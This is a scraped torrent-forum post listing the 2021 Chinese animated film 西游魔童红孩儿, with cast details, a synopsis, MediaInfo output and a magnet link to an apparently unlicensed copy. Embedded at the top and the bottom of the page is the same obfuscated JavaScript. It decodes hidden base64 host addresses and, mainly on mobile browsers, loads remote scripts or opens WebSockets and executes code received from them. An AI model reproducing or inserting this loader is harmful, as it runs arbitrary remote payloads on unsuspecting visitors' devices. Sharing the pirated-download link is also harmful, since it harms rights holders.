西游魔童红孩儿[国语配音/中文字幕].Xi.You.Mo.Tong.Hong.Hai.Er.2021.WEB-DL.4K.H265.AAC 1.92GB

版主小s 27天前 299

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 西游魔童红孩儿

◎年 代 2021

◎产 地 中国大陆

◎语 言 汉语普通话

◎上映日期 2021-09-01(中国大陆网络)

◎IMDb链接 https://www.imdb.com/title//

◎豆瓣链接 https://movie.douban.com/subject/35182980/

◎导 演 陈聚力 Juli Chen (id:1400685)

◎编 剧 牛毛毛 Maomao Niu (id:1428211)

◎演 员 耿业庭 Eddy (id:1427930)

娃尔 Er Wa (id:1413335)

方家翊 Jiayi Fang (id:1376639)

黑子 Zi Hei (id:1274723)

涓子 Juan Zi (id:1313796)

段星羽 (id:1461369)

◎标 签 网络 / 大陆 / 大烂片 / 国产 / 动作 / 娃尔 / 大陆电影 / 电影

◎简 介

讲述了已被观音收为善财童子的红孩儿,尊从师命去天机试炼会修行。一心想成为英雄的他,却因为仙、妖混血的身份遭到众人排斥。面对众人的误解和即将到来的三界浩劫,红孩儿在关键时刻毅然决然摒弃成见,放下争强好胜之心,与哪吒、小龙女等人一起勇敢面对邪恶,最终战胜魔王赢得了世人认可的故事

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 108043766066011369859803731383734116504 (0x514878F1A31B4F5F87C51ABB327A2098)

  4. Complete name : Xi You Mo Tong Hong Hai Er 2021 WEB-DL 4K H265 [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 1.92 GiB

  8. Duration : 1 h 21 min

  9. Overall bit rate : 3 385 kb/s

  10. Encoded date : UTC 2021-11-02 23:22:25

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 21 min

  20. Bit rate : 3 192 kb/s

  21. Width : 3 840 pixels

  22. Height : 1 632 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 25.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 8 bits

  29. Bits/(Pixel*Frame) : 0.020

  30. Stream size : 1.81 GiB (94%)

  31. Default : Yes

  32. Forced : No


  33. Audio

  34. ID : 2

  35. Format : AAC LC

  36. Format/Info : Advanced Audio Codec Low Complexity

  37. Codec ID : A_AAC-2

  38. Duration : 1 h 21 min

  39. Bit rate : 192 kb/s

  40. Channel(s) : 2 channels

  41. Channel layout : L R

  42. Sampling rate : 44.1 kHz

  43. Frame rate : 43.066 FPS (1024 SPF)

  44. Compression mode : Lossy

  45. Stream size : 110 MiB (6%)

  46. Language : Chinese

  47. Default : Yes

  48. Forced : No


  49. Text #1

  50. ID : 3

  51. Format : UTF-8

  52. Codec ID : S_TEXT/UTF8

  53. Codec ID/Info : UTF-8 Plain Text

  54. Duration : 1 h 17 min

  55. Bit rate : 34 b/s

  56. Count of elements : 1074

  57. Stream size : 19.6 KiB (0%)

  58. Title : 简体中文

  59. Language : Chinese

  60. Default : Yes

  61. Forced : No


  62. Text #2

  63. ID : 4

  64. Format : UTF-8

  65. Codec ID : S_TEXT/UTF8

  66. Codec ID/Info : UTF-8 Plain Text

  67. Duration : 1 h 17 min

  68. Bit rate : 34 b/s

  69. Count of elements : 1074

  70. Stream size : 19.6 KiB (0%)

  71. Title : 繁体中文

  72. Language : Chinese

  73. Default : No

  74. Forced : No


  75. Text #3

  76. ID : 5

  77. Format : UTF-8

  78. Codec ID : S_TEXT/UTF8

  79. Codec ID/Info : UTF-8 Plain Text

  80. Duration : 1 h 18 min

  81. Bit rate : 61 b/s

  82. Count of elements : 1092

  83. Stream size : 35.6 KiB (0%)

  84. Title : 阿拉伯语

  85. Language : Arabic

  86. Default : No

  87. Forced : No


  88. Text #4

  89. ID : 6

  90. Format : UTF-8

  91. Codec ID : S_TEXT/UTF8

  92. Codec ID/Info : UTF-8 Plain Text

  93. Duration : 1 h 18 min

  94. Bit rate : 48 b/s

  95. Count of elements : 1092

  96. Stream size : 28.2 KiB (0%)

  97. Title : 韩语

  98. Language : Korean

  99. Default : No

  100. Forced : No


  101. Text #5

  102. ID : 7

  103. Format : UTF-8

  104. Codec ID : S_TEXT/UTF8

  105. Codec ID/Info : UTF-8 Plain Text

  106. Duration : 1 h 18 min

  107. Bit rate : 48 b/s

  108. Count of elements : 1092

  109. Stream size : 27.7 KiB (0%)

  110. Title : 英语

  111. Language : English

  112. Default : No

  113. Forced : No


  114. Text #6

  115. ID : 8

  116. Format : UTF-8

  117. Codec ID : S_TEXT/UTF8

  118. Codec ID/Info : UTF-8 Plain Text

  119. Duration : 1 h 18 min

  120. Bit rate : 48 b/s

  121. Count of elements : 1092

  122. Stream size : 27.8 KiB (0%)

  123. Title : 马来语

  124. Language : Malay

  125. Default : No

  126. Forced : No


  127. Text #7

  128. ID : 9

  129. Format : UTF-8

  130. Codec ID : S_TEXT/UTF8

  131. Codec ID/Info : UTF-8 Plain Text

  132. Duration : 1 h 18 min

  133. Bit rate : 113 b/s

  134. Count of elements : 1092

  135. Stream size : 65.6 KiB (0%)

  136. Title : 泰语

  137. Language : Thai

  138. Default : No

  139. Forced : No


  140. Text #8

  141. ID : 10

  142. Format : UTF-8

  143. Codec ID : S_TEXT/UTF8

  144. Codec ID/Info : UTF-8 Plain Text

  145. Duration : 1 h 17 min

  146. Bit rate : 41 b/s

  147. Count of elements : 1076

  148. Stream size : 23.6 KiB (0%)

  149. Title : 西班牙语

  150. Language : Spanish

  151. Default : No

  152. Forced : No


  153. Text #9

  154. ID : 11

  155. Format : UTF-8

  156. Codec ID : S_TEXT/UTF8

  157. Codec ID/Info : UTF-8 Plain Text

  158. Duration : 1 h 18 min

  159. Bit rate : 50 b/s

  160. Count of elements : 1092

  161. Stream size : 29.1 KiB (0%)

  162. Title : 印尼语

  163. Language : Indonesian

  164. Default : No

  165. Forced : No


  166. Text #10

  167. ID : 12

  168. Format : UTF-8

  169. Codec ID : S_TEXT/UTF8

  170. Codec ID/Info : UTF-8 Plain Text

  171. Duration : 1 h 18 min

  172. Bit rate : 63 b/s

  173. Count of elements : 1092

  174. Stream size : 36.4 KiB (0%)

  175. Title : 越南语

  176. Language : Vietnamese

  177. Default : No

  178. Forced : No




复制代码


TAGS 奇幻 剧情

磁力链:
  • magnet:?xt=urn:btih:3D861A16BA7D0B14FAAFB6BF6161EC3A27220802

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};